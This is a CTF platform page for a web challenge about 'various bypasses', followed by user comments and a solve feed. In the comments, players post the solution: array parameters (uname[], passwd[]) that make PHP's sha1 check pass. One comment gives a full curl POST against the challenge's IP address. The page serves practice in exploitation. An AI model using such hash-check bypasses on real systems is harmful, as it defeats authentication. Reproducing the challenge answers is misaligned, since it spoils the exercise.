各种绕过哟WEB 未解决

分数: 30 金币: 3
题目作者: harry
一  血: jiangdie666
一血奖励: 2金币
解  决: 4813
提  示:
描  述:
各种绕过
评论
ctfer-pls 5月前

GET:id=margin&uname[]=111a POST:passwd[]=2bba

回复 0

2686213396 5月前

flag{*********}

回复 0

2686213396 5月前

我喜欢hackbar这个插件(POST方法的最优选择),相当于帮你写好请求头格式的bp,只需要填写上传的参数即可,本题思路,直接url传参uname和id,通过数组实现绕过,再由hackbarPOSTpasswd的参数,获得flag,这道题目的核心依旧是代码审计

回复 0

iNMB 5月前

很奇怪bp不行,用其他方法可以不知道为什么

回复 1

SLfanCTF 5月前

数组sha1为空,传入数组绕过

回复 0

zhuizhui 5月前

POST /?id=margin&uname[]=1 passwd[]=11 数组绕过sha-1

回复 0

ahsjezyt 5月前

flag{********}

回复 0

奕生 6月前

bp可以,就是要把GET请求改成POST请求

回复 0

xlogsrc 6月前

curl -X POST "http://117.72.52.127:11657/?uname[]=a&id=margin" -d "passwd[]=b"

回复 0

liuguowang75 8月前

passwd[]=2无法提交,最终还是用python脚本解决了,两次这样子了

回复 1
theo1234 7月前

请问die终止了执行,python脚本还能获得结果吗

回复 0

WriteUp

image
harry

3 金币

评分(4)

解题动态

Blmn 攻破了该题 24分钟前
1348931180 攻破了该题 1小时前
xjn12 攻破了该题 2小时前
sdxsdxl 攻破了该题 3小时前
1293273679 攻破了该题 22小时前
zdabajfk 攻破了该题 23小时前
liberator 攻破了该题 1天前
rainmoon 攻破了该题 1天前
有点易斯但不多 攻破了该题 2天前
mianhttt 攻破了该题 2天前
linatiny 攻破了该题 2天前
Anna-july 攻破了该题 2天前
crayon666 攻破了该题 2天前
easier 攻破了该题 2天前
Muimi 攻破了该题 2天前
seedis 攻破了该题 3天前
lizzzzp 攻破了该题 3天前
3505232853 攻破了该题 3天前
LiuMiYA 攻破了该题 3天前
竹海赏云 攻破了该题 3天前
问题反馈